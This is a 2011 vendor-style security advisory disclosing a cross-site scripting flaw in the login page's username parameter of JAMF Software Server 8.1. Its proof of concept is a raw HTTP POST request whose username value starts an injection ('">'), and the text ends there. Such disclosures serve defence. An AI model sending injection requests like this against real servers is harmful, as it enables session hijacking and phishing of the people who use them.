============================================================ FOREGROUND SECURITY, SECURITY ADVISORY 2011-001 - Original release date: August 27, 2011 - Discovered by: Jose Carlos de Arriba - Contact: (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com) - Severity: 4.3/10 (Base CVSS Score) ============================================================ I. VULNERABILITY ------------------------- Casper Suite - JAMF Software Server (JSS) 8.1 Cross-Site Scripting - XSS (prior versions have not been checked but could be vulnerable too). II. BACKGROUND ------------------------- JAMF Software Server (JSS). The JSS is the central core to the Casper Suite and ties all the other components together. The Casper Suite simplifies the life of system administrators with a comprehensive platform to manage Mac OS X computers and iOS mobile devices. The Casper Suite increases the efficiency of your IT staff, reduces the cost of ownership, and minimizes liability by providing a framework that enforces software licensing compliance, security standards, energy usage, and other organizational rules and requirements. III. DESCRIPTION ------------------------- JAMF Software Server (JSS) presents a Cross-Site Scripting vulnerability on its "username" parameter in the login page, due to an insufficient sanitization on user supplied data and encoding output. A malicious user could perform session hijacking or phishing attacks. IV. PROOF OF CONCEPT ------------------------- POST /index.html HTTP/1.1 Content-Length: 94 Content-Type: application/x-www-form-urlencoded Cookie: JSESSIONID=XXXXXXXXXXXXXXX; JSESSIONID=YYYYYYYYYYYYYY; JSESSIONID=ZZZZZZZZZZZZZZZZZZZZ; tsfrwquc="" Host: X.X.X.X:443 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) password=ForegroundSecurity&submit=Login&username=">